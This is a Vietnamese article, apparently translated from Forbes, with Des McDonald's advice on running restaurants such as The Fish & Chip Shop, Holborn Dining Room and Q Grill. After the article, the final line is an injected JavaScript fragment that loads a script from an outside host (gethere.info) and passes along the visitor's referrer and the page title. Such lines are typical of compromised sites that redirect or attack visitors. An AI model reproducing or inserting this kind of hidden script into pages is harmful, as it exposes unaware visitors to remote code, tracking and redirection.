5 lời khuyên kinh doanh nhà hàng thành công từ Des McDonald (Phần 2)

Sự nổi tiếng này có được cũng phải trải qua khó khăn để tạo ra thành công của một nhà hàng: bạn cần có đầu óc kinh doanh cũng như có được các món ngon nhất…Cùng xem những chia sẻ của McDonald về công việc kinh doanh với xuất phát điểm từ công việc của đầu bếp.

Des McDonald

Đừng đánh giá thấp công việc vất vả khi thiết lập nhà hàng

Thật tuyệt vời khi được làm việc trong một công ty lớn và nó luôn là tham vọng cháy bỏng trong tôi. Và sau một thời gian tôi đã đạt được những gì tôi có thể với nhóm và tôi muốn phát triển thương hiệu của riêng tôi, kéo nhóm tôi lại với nhau, làm một vài thứ cho chính mình. Tôi luôn muốn góp tiền làm việc với người khác chứ không chỉ tiền của tôi và hương vị thành công với tiền của mình rất khác với tiền của người khác. Có rất nhiều người xung quanh tôi, những nhà đầu tư muốn tham gia vào nhà hàng, và may mắn là tôi khá khiêm tốn: Tôi không ngại xắn tay áo làm việc và tham gia vào các hoạt động của nhà hàng. Nó khác việc bạn ở trong phòng họp mỗi ngày nhưng đó là một kiểm tra thực tế tốt và tôi đã rất thích nó. Và đôi khi bạn tham khảo quá nhiều bạn có thể bị mắc kẹt trong đó, lúc ấy cần quay trở lại vấn đề cơ bản“.

Des McDonald

Tìm khoảng trống trên thị trường – và lấp đầy chúng với sự tinh tế

Tôi luôn thích cá và khoai tây chiên – Tôi thích sản phẩm tuyệt vời, được phục vụ đơn giản. Cá và khoai tây chiên là món Anh và tôi nghĩ rằng đó là lựa chọn đúng – The Fish & Chip Shop đã cải thiện khoảng trống lớn trong thị trường. Chúng tôi phục vụ cá và khoai tây chiên, hoặc cá trắng, cá chẽm, sò, với một ly Prosecco hoặc một cốc bia thủ công. Tôi ghép các ý tưởng lại với nhau rất nhanh chóng: Tôi không phát minh cá và khoai tây chiên, nhưng nó là một cái gì đó tất cả mọi người đều biết đến và yêu thích, khách đi đông vẫn hài lòng trong môi trường vui vẻ. Holborn Dining Room tôi đã biến nó thành phòng ăn lớn của Anh quy mô, nhà hát, với sự phục vụ ấm áp, thân thiện. Bạn có thể uống cà phê vào buổi sáng, một cuộc họp, một bữa ăn trưa kinh doanh, đứng tại quầy bar và thưởng thức một cốc bia thủ công hoặc một ly Champagne sau giờ làm việc, món ăn ngon …nơi cung cấp những thứ tốt nhất của Anh trong một môi trường sống động vui vẻ. Tôi nghĩ rằng trong năm năm qua, chúng ta đã bắt đầu bước ra khỏi cuộc khủng hoảng tài chính, khách hàng đến ăn nhiều hơn nhưng chi tiêu ít hơn. Ngày nay mọi người muốn có niềm vui khi họ đi ra ngoài, họ không muốn ở trong một căn phòng hút tất cả năng lượng ra khỏi chúng. Q Grill cũng cung cấp nhà hát, với các món nướng lớn, than tự nhiên và nướng cổ điển – với cách làm cách điệu đơn giản hơn. Tôi không chỉ muốn tỏ lòng tôn kính đến các món nướng Texas; chúng tôi đã làm rất tốt, thức ăn rất tuyệt vời có nguồn gốc trong môi trường thân thiện, protein lớn, cá lớn – nhưng tôi tin rằng mọi người muốn có thực phẩm lành mạnh ngay cả khi họ thưởng thức“.

Hãy nhớ rằng bạn đang ở dưới ánh đèn sân khấu mỗi ngày

Tôi nghĩ rằng thị trường luôn được phân biệt chất lượng – thế giới của phương tiện truyền thông xã hội có thể chuyển thông tin sản phẩm. Khi chúng tôi mở nhà hàng những năm trước, chúng tôi sẽ đợi cho Fay [Maschler] và Giles [Coren] quảng cáo cho. Bây giờ có hàng trăm blogger và các trang web có đầy đủ thông tin. Một vài báo cáo trên một số trang web có lẽ là không thực tế nhưng nó thường là một thông điệp rất tích cực cho doanh nghiệp. Tôi nghĩ rằng nó hữu ích: Bạn không thể có một dịch vụ đi xuống, mà phải luôn đi lên!

The Forbes

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;